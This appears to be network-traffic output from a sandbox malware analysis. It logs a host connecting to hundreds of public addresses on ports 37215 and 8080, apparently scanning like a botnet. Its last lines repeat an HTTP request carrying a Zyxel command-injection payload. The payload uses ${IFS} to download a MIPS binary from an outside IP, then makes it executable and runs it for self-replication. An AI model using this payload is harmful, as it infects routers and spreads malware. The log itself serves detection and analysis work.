            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.164.3.200:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.27.86.3:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.135.49.31:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.133.74.206:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 38.56.62.58:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.24.59.61:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.226.36.227:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.139.152.127:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.27.243.167:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 75.116.231.56:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.195.238.223:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 158.42.245.52:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.142.224.142:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 204.213.160.97:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.166.164.108:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.175.29.186:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 136.236.66.11:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 220.171.200.172:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.112.74.172:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.53.82.118:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 84.230.228.31:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.1.50.200:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.108.77.63:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 222.54.195.76:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 104.128.214.225:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.224.15.93:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.234.255.130:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.84.110.232:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 117.156.234.49:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.150.44.163:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.11.64.90:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.67.47.170:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.66.154.5:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.34.156.92:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 49.62.168.95:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.210.116.111:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.51.159.151:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.178.253.20:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 168.57.5.119:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.185.245.68:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.113.97.55:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.82.171.176:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.0.23.169:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 37.29.79.73:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.36.187.145:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.223.4.245:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.42.227.150:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 106.136.117.176:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.71.14.35:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.212.219.187:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.52.194.244:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.209.63.228:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.115.216.173:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.196.20.237:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.56.52.23:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 77.227.252.1:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.60.52.178:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.90.76.24:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.3.69.131:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.108.142.131:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.7.198.235:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.220.39.41:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.33.208.211:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 143.164.51.197:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 144.10.129.226:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 40.111.201.114:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.193.158.81:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.18.16.158:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.101.59.96:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.124.205.67:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.230.163.13:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.128.164.62:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.21.111.197:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.18.140.222:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.62.221.44:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.100.88.71:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.81.252.68:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.251.141.150:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.125.194.228:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.119.59.208:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.180.122.170:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 199.240.154.39:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.116.115.123:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 80.23.51.67:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.197.169.233:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.200.84.149:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 208.172.85.31:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.171.141.153:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.23.170.52:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.176.225.161:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.16.47.24:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 167.154.206.83:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.233.219.129:37215
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 211.104.79.232:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 98.118.53.232:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 90.227.231.233:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 46.162.74.230:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 156.15.39.162:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 137.40.43.206:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 173.134.143.70:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 85.246.162.177:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 101.34.139.38:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 116.134.125.113:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 1.51.126.93:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 99.31.127.30:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 13.247.123.73:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 47.19.40.24:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 1.196.45.36:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 140.188.192.222:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 186.133.34.58:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 83.227.137.44:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 54.197.121.78:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 186.164.129.106:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 147.17.249.142:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 8.33.111.170:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 98.201.154.171:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 64.69.107.210:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 79.227.176.240:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 35.162.172.9:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 176.16.243.201:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 140.171.38.18:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 128.84.91.87:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 157.108.232.244:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 32.1.59.160:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 183.58.115.127:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 168.127.143.162:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 98.47.207.212:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 9.57.116.27:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 67.106.242.219:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 34.194.238.238:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 168.215.56.183:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 155.184.15.129:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 144.196.58.9:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 162.174.8.29:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 65.223.48.188:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 81.242.97.92:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 181.193.59.69:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 82.28.97.137:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 129.152.229.18:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 87.254.204.131:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 105.150.161.248:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 158.158.243.12:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 62.11.73.253:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 186.182.188.54:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 61.177.199.189:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 82.181.100.207:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 152.79.213.4:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 202.162.61.149:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 210.103.60.101:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 81.172.181.242:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 163.237.222.101:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 194.183.212.20:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 76.18.44.181:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 182.185.131.90:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 181.66.171.224:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 27.23.180.202:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 85.204.226.209:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 180.215.42.223:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 80.116.158.210:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 98.241.161.180:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 153.121.240.252:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 186.9.161.39:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 201.228.215.180:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 75.227.48.123:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 98.197.53.202:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 158.199.154.80:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 66.220.104.129:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 36.254.183.180:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 2.67.41.36:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 205.212.227.205:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 83.78.99.88:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 147.41.58.54:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 52.177.141.58:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 209.58.237.31:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 133.99.93.170:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 4.84.182.195:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 5.114.80.81:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 206.31.248.74:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 94.38.196.123:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 67.149.233.106:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 64.142.185.112:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 89.70.31.207:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 173.13.157.227:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 144.124.37.10:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 109.50.5.250:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 203.197.89.183:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 137.82.42.96:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 39.115.238.147:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 34.2.113.143:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 78.109.241.180:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 106.66.151.175:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 24.163.103.74:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 64.111.175.152:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 161.153.209.57:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 32.96.99.246:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 92.110.206.82:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 166.8.223.52:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 188.68.165.205:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 182.186.115.5:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 148.39.91.144:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 124.219.169.233:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 169.43.71.55:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 105.131.110.100:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 167.202.0.90:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 101.125.193.182:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 93.10.121.212:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 135.78.229.85:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 173.211.232.247:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 44.200.104.241:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 176.222.221.92:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 159.156.191.135:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 45.59.248.174:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 73.150.178.27:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 1.235.153.0:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 150.104.138.84:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 66.243.187.165:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 103.239.71.205:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 83.131.245.142:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 107.158.137.180:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 212.155.173.192:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 13.82.10.229:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 87.188.96.179:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 38.239.1.253:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 75.28.225.12:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 102.164.76.39:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 110.210.19.53:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 47.62.82.7:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 9.110.124.50:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 181.12.207.7:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 93.223.240.225:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 42.12.40.11:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 53.98.253.69:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 98.228.167.254:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 218.59.61.8:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 92.193.171.66:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 96.19.16.91:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 195.213.59.45:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 128.41.105.61:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 148.211.84.44:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 114.197.204.78:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 34.205.179.208:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 182.190.11.17:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 195.21.16.63:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 65.1.85.209:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 78.104.97.228:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 129.108.125.177:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 181.52.63.250:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 49.105.145.198:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 2.2.28.72:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 187.197.110.135:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 202.103.133.32:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 57.193.59.196:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 171.230.200.76:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 181.194.88.145:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 196.102.187.69:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 112.37.88.241:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 164.219.193.201:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 221.171.194.32:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 36.210.120.45:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 50.9.97.89:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 59.16.31.53:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 69.179.41.78:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 204.172.37.210:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 46.93.167.41:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 140.14.11.126:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 49.103.55.75:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 140.105.82.193:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 135.229.160.241:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 13.220.249.197:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 151.14.2.48:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 178.169.85.38:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 25.232.132.155:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 108.33.119.162:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 204.251.99.151:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 93.221.186.16:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 161.45.31.54:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 109.186.130.98:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 218.241.4.243:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 77.208.212.212:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 88.201.104.134:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 196.125.239.211:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 18.138.102.144:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 165.165.234.196:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 173.235.152.19:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 63.54.195.57:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 137.160.40.96:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 43.143.100.107:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 51.79.144.95:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 155.222.182.166:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 207.142.240.97:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 53.14.245.145:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 111.123.98.71:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 25.124.151.78:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 199.153.122.126:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 203.124.237.91:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 150.239.211.139:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 175.119.239.184:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 120.245.241.226:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 223.152.171.41:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 98.114.11.137:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 101.155.212.192:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 42.118.61.95:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 168.83.182.103:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 141.160.2.180:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 147.71.112.134:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 113.220.87.131:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 135.107.57.162:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 110.184.84.61:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 187.199.49.79:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 190.244.14.7:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 44.219.154.15:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 207.29.182.76:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 159.60.218.66:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 74.50.250.161:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 138.188.237.239:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 79.68.125.124:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 191.108.204.128:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 84.1.79.93:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 138.54.70.237:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 133.1.179.94:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 94.205.218.130:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 70.17.16.86:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 208.129.231.38:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 155.110.118.92:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 208.237.168.116:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 43.65.220.118:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 86.65.97.75:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 184.41.201.115:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 128.192.181.94:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 31.105.164.117:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 216.209.239.170:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 4.11.90.81:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 95.235.215.152:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 74.87.3.29:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 75.114.3.98:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 47.183.163.137:8080
            Source: global trafficTCP traffic: 192.168.2.14:47387 -> 131.179.224.123:8080
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
